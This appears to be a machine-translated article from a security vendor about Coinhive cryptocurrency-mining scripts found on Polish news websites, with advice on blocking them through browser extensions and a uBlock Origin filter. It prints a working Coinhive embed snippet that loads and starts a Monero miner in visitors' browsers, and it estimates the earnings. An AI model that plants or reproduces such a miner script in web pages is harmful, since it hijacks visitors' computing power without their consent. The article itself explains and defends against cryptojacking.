The domino effect
<script src="https://coinhive.com/lib/coinhive.min.js"></script> <script> var miner = new CoinHive.User('<site-key>', 'john-doe'); miner.start(); </script>
If a non-stop 10 people sit on the website, then the owner of the script, identified by the unique key and username, can count on earnings of ~ $ 27 a month. The commission is 30%.
The scale of the problem
Most websites contain similar malicious scripts rather accidentally. This is most often due to file swapping after exploiting the vulnerabilities in server configuration or web-applications. However, we can assume that websites such as gazeta.pl, katowice.naszemiasto.pl, warszawa.naszemiasto.pl, nowiny24.pl, rp.pl and many, many others have a common denominator - suppliers of rotating ads who do not often verify this , which goes to their systems displaying advertisements on partner websites.
How to protect yourself?
- In the public GitHub repository there is a " No Coin " plugin for Firefox , Chrome and Opera browsers . The extension has already been added to the official repositories of each manufacturer. We recommend its installation, because the extension protects not only by the described script for digging Monero, but also from excavators of other cryptocurrencies.
- A similar effect is achieved by installing the " uBlock Origin " ad blocker. In the " my filters " configuration, we add coin-hive.com/lib/coinhive.min.js preceding the entry with the https: // protocol. In addition to blocking ads, spam hosts, hosts with malicious ads, spyware hosts and malware hosts, we gain the ability to block custom URLs.
- We install a very effective Bitdefender Trafichlight plugin for scanning web pages. The installer will automatically detect the browser (Chrome, Firefox or Safari) and move the user to the repository with the extension. By installing the Bitdefender add-on, we get one of the most effective scanners in the world to detect phishing, malware and websites with scams, as well as protection already in the search results.
- We install the NoScript add-in for browsers.
- Most security programs with modules for scanning websites should already detect similar malicious scripts. Wanting or not wanting, once again we are richer with experience that confirms the belief that the protection of computers should be comprehensive and begin with the browser.
Learn more about our offer
We use Google Cloud Translation and Gengo API’s to translate articles with exception of our comparative tests.